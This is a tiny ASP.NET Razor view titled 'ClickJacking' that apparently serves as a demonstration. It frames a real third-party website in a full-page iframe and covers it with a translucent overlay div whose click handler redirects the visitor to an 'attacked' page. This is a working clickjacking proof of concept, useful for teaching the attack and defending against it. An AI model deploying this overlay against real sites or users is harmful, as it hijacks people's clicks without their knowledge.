﻿
@{
    ViewBag.Title = "ClickJacking";
    Layout = "~/Views/Shared/_EmptyLayout.cshtml";
}
<div style="width:100%; height:6755px; background-color:hsla(0, 100%, 50%, 0.3) ;position:absolute;" onclick="location.href = 'http://marsen.dev/demo/attacked';"></div>
<iframe src="http://www.mobile01.com/" style="width:100%; height:6755px;">
</iframe>

